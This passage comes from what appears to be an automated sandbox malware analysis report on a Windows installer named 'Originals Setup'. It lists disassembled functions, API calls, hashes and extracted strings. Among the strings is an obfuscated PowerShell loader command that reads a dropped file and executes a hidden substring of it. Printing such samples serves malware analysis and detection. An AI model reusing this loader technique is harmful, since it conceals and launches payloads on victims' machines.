                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                                                                                                            • Instruction ID: 72d9328d989bd28a4b04e8d0bfc49dcb98a3c5c69b67aa4312834a6063493829
                                                                                                                                            • Opcode Fuzzy Hash: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                                                                                                            • Instruction Fuzzy Hash: 54B01235685200BBEE324F00DD0DF497E72F764B02F008034B300240F0C6B300A5DB19
                                                                                                                                            Function 00403E95 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00403C72), ref: 00403E9F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                            • Opcode ID: 9d98744450fa71a660f12360689da69116cf16b41945ad655af5f03ec15b630f
                                                                                                                                            • Instruction ID: 924e4898ca7b55125a55dbaf25208a334d7a0dcb277bd93e9961852eecaff849
                                                                                                                                            • Opcode Fuzzy Hash: 9d98744450fa71a660f12360689da69116cf16b41945ad655af5f03ec15b630f
                                                                                                                                            • Instruction Fuzzy Hash: 9BA00176808205ABCB029B60EF09D8ABF62BBA4705B028435E65594174DA325865FF9A

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 00404823 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 0040483B
                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404846
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404890
                                                                                                                                            • LoadBitmapA.USER32(0000006E), ref: 004048A3
                                                                                                                                            • SetWindowLongA.USER32(?,000000FC,00404E1A), ref: 004048BC
                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048D0
                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048E2
                                                                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 004048F8
                                                                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404904
                                                                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404916
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404919
                                                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404944
                                                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404950
                                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E5
                                                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A10
                                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A24
                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404A53
                                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A61
                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404A72
                                                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B6F
                                                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BD4
                                                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BE9
                                                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C0D
                                                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C2D
                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404C42
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00404C52
                                                                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CCB
                                                                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404D74
                                                                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D83
                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DA3
                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404DF1
                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404DFC
                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404E03
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                            • String ID: $M$N
                                                                                                                                            • API String ID: 1638840714-813528018
                                                                                                                                            • Opcode ID: 530fea0a5efbac08350800dd6edac4f541af9ecf28185b85d10bd058308ad18e
                                                                                                                                            • Instruction ID: e15dc7f2636af8312206252945434afb9f5109210b4da1b7208a5bfe9f4b469d
                                                                                                                                            • Opcode Fuzzy Hash: 530fea0a5efbac08350800dd6edac4f541af9ecf28185b85d10bd058308ad18e
                                                                                                                                            • Instruction Fuzzy Hash: F30281B0A00209AFDB20DF54DD45AAE7BB5FB84315F10813AF610BA2E1D7789E42DF58
                                                                                                                                            Function 004042B1 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404300
                                                                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 0040432A
                                                                                                                                            • SHBrowseForFolderA.SHELL32(?,0041F0B0,?), ref: 004043DB
                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004043E6
                                                                                                                                            • lstrcmpiA.KERNEL32(: Completed,Originals Setup: Completed), ref: 00404418
                                                                                                                                            • lstrcatA.KERNEL32(?,: Completed), ref: 00404424
                                                                                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404436
                                                                                                                                              • Part of subcall function 004053B5: GetDlgItemTextA.USER32(?,?,00000400,0040446D), ref: 004053C8
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
                                                                                                                                              • Part of subcall function 00405E28: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2
                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(0041ECA8,?,?,0000040F,?,0041ECA8,0041ECA8,?,00000000,0041ECA8,?,?,000003FB,?), ref: 004044F3
                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040450E
                                                                                                                                              • Part of subcall function 00404667: lstrlenA.KERNEL32(Originals Setup: Completed,Originals Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404582,000000DF,00000000,00000400,?), ref: 00404705
                                                                                                                                              • Part of subcall function 00404667: wsprintfA.USER32 ref: 0040470D
                                                                                                                                              • Part of subcall function 00404667: SetDlgItemTextA.USER32(?,Originals Setup: Completed), ref: 00404720
                                                                                                                                            Strings
                                                                                                                                            • "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , xrefs: 004042CA
                                                                                                                                            • A, xrefs: 004043D4
                                                                                                                                            • Originals Setup: Completed, xrefs: 004043AE, 00404411
                                                                                                                                            • C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens, xrefs: 00404401
                                                                                                                                            • : Completed, xrefs: 00404412, 00404417, 00404422
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                            • String ID: "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $: Completed$A$C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$Originals Setup: Completed
                                                                                                                                            • API String ID: 2624150263-968870177
                                                                                                                                            • Opcode ID: 91bfd2be80532f9d84de11e62587bd6305631a6878a96e32016dec978ead2281
                                                                                                                                            • Instruction ID: bbf5d18d822f9ae48c727ed4067559616aa27203017815afcead8a6077e661fe
                                                                                                                                            • Opcode Fuzzy Hash: 91bfd2be80532f9d84de11e62587bd6305631a6878a96e32016dec978ead2281
                                                                                                                                            • Instruction Fuzzy Hash: 26A172B1900208ABDB11DFA6CD45BAF77B8EF84315F10843BF605B62D1D77C9A418B69
                                                                                                                                            Function 0040547D Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004054A6
                                                                                                                                            • lstrcatA.KERNEL32(00420CE0,\*.*,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004054EE
                                                                                                                                            • lstrcatA.KERNEL32(?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 0040550F
                                                                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 00405515
                                                                                                                                            • FindFirstFileA.KERNEL32(00420CE0,?,?,?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 00405526
                                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055D3
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004055E4
                                                                                                                                            Strings
                                                                                                                                            • \*.*, xrefs: 004054E8
                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                                                            • "C:\Users\user\Desktop\HVSU7GbA5N.exe", xrefs: 0040547D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                            • String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                            • API String ID: 2035342205-316821613
                                                                                                                                            • Opcode ID: 3622af7b4e34dfa1073d2e94fd2a24ea7cd3a3c76273722f7a65329ed5da0391
                                                                                                                                            • Instruction ID: f67e5f98a1b48f8b06c5baa1d65efce896aecc78963fcddf766b22b57dd7cee7
                                                                                                                                            • Opcode Fuzzy Hash: 3622af7b4e34dfa1073d2e94fd2a24ea7cd3a3c76273722f7a65329ed5da0391
                                                                                                                                            • Instruction Fuzzy Hash: 1851C070800A04BADF21AB25CC45BAF7AB9DB42314F14417BF444752D6D73C9A82DEAD
                                                                                                                                            Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens, xrefs: 004020CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens
                                                                                                                                            • API String ID: 123533781-2870171211
                                                                                                                                            • Opcode ID: ca4ae825dc67163e39cab61414bf8ce73cd593aa0e1ad614b2f180b51b0ab79c
                                                                                                                                            • Instruction ID: d4c62fdc28843dfc30489809ccaf5da6a3b2e007b03a33f3ec024107d8c1ad9a
                                                                                                                                            • Opcode Fuzzy Hash: ca4ae825dc67163e39cab61414bf8ce73cd593aa0e1ad614b2f180b51b0ab79c
                                                                                                                                            • Instruction Fuzzy Hash: 20417D71A00209BFCB00EFA4CE88E9E7BB5BF48314B2042A9F911FB2D0D6799D41DB54
                                                                                                                                            Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                            • Opcode ID: 5285005a5125483a87b18e253de9f6a1e11305b0e3eef9b4f05c1d3784207578
                                                                                                                                            • Instruction ID: e6850a469ed090b17ef1dde7e6b5e911daaadda975b469663bbec5c58d3b5f53
                                                                                                                                            • Opcode Fuzzy Hash: 5285005a5125483a87b18e253de9f6a1e11305b0e3eef9b4f05c1d3784207578
                                                                                                                                            • Instruction Fuzzy Hash: B4F0A772604110ABD700E7749A49AEE7778DB51314F6045BBE141E20C1D3B85A41DA2A
                                                                                                                                            Function 00403FBC Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404047
                                                                                                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 0040405B
                                                                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404079
                                                                                                                                            • GetSysColor.USER32(?), ref: 0040408A
                                                                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404099
                                                                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040A8
                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004040AB
                                                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040BA
                                                                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040CF
                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404131
                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00404134
                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040415F
                                                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040419F
                                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004041AE
                                                                                                                                            • SetCursor.USER32(00000000), ref: 004041B7
                                                                                                                                            • ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,00000001), ref: 004041CA
                                                                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004041D7
                                                                                                                                            • SetCursor.USER32(00000000), ref: 004041DA
                                                                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404206
                                                                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040421A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                            • String ID: : Completed$N$open
                                                                                                                                            • API String ID: 3615053054-3069340868
                                                                                                                                            • Opcode ID: 8a9ae112f1df4d10fa1381c7e2026d7722a962e20b7826b4dde34b5403f790f5
                                                                                                                                            • Instruction ID: 7c7fff9fd1e172092069843c90e077616bef9326b7299cf1cce5c9f34bd91e75
                                                                                                                                            • Opcode Fuzzy Hash: 8a9ae112f1df4d10fa1381c7e2026d7722a962e20b7826b4dde34b5403f790f5
                                                                                                                                            • Instruction Fuzzy Hash: 8961E5B1A40209BFEB109F60DD45F6A7B78FB44741F10403AFB05BA2D1C7B8A951CB99
                                                                                                                                            Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                            • DrawTextA.USER32(00000000,Originals Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                            • String ID: F$Originals Setup
                                                                                                                                            • API String ID: 941294808-1618244422
                                                                                                                                            • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                                                            • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                                                                                                            • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                                                            • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
                                                                                                                                            Function 004058F5 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrcpyA.KERNEL32(00421A68,NUL,?,00000000,?,00000000,?,00405A99,?,?,00000001,0040563C,?,00000000,000000F1,?), ref: 00405905
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A99,?,?,00000001,0040563C,?,00000000,000000F1,?), ref: 00405929
